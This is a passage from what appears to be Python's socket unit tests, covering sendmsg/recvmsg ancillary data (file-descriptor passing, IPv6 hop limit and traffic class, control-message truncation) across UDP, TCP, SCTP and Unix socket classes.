self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
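# A minimal sketch (not part of the test suite and never called at import
# time) of the SCM_RIGHTS descriptor passing that SCMRightsTest exercises
# above.  Assumes a POSIX platform with AF_UNIX, sendmsg() and recvmsg();
# the function name is purely illustrative.
def _sketch_pass_fd(fd_to_send):
    left, right = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        # The descriptor travels as ancillary data alongside at least one
        # byte of ordinary data.
        left.sendmsg([b"x"],
                     [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                       array.array("i", [fd_to_send]))])
        msg, ancdata, flags, addr = right.recvmsg(
            1, socket.CMSG_SPACE(SIZEOF_INT))
        fds = array.array("i")
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            if (cmsg_level == socket.SOL_SOCKET and
                    cmsg_type == socket.SCM_RIGHTS):
                # Drop any trailing bytes that do not form a whole int.
                fds.frombytes(cmsg_data[:len(cmsg_data)
                                        - (len(cmsg_data) % fds.itemsize)])
        # Each received value is a new descriptor duplicated into this
        # process; the caller is responsible for closing it.
        return list(fds)
    finally:
        left.close()
        right.close()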
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
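# A minimal sketch (not part of the test suite and never called at import
# time) of receiving the RFC 3542 hop limit as ancillary data, the pattern
# checkHopLimit() above verifies.  Assumes an IPv6-capable host where the
# IPV6_RECVHOPLIMIT/IPV6_HOPLIMIT options exist; 'sock' is assumed to be a
# bound AF_INET6 SOCK_DGRAM socket with a datagram waiting, and the
# function name is purely illustrative.
def _sketch_recv_hop_limit(sock):
    # Ask the kernel to attach an IPV6_HOPLIMIT control message to each
    # received packet, then pick it out of the ancillary data list.
    sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVHOPLIMIT, 1)
    msg, ancdata, flags, addr = sock.recvmsg(1024,
                                             socket.CMSG_SPACE(SIZEOF_INT))
    for cmsg_level, cmsg_type, cmsg_data in ancdata:
        if (cmsg_level == socket.IPPROTO_IPV6 and
                cmsg_type == socket.IPV6_HOPLIMIT):
            hop_limit = array.array("i")
            hop_limit.frombytes(cmsg_data)
            return msg, hop_limit[0]
    return msg, None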
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests.  Installs a SIGALRM
    # handler that raises ZeroDivisionError and removes it on teardown,
    # along with any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
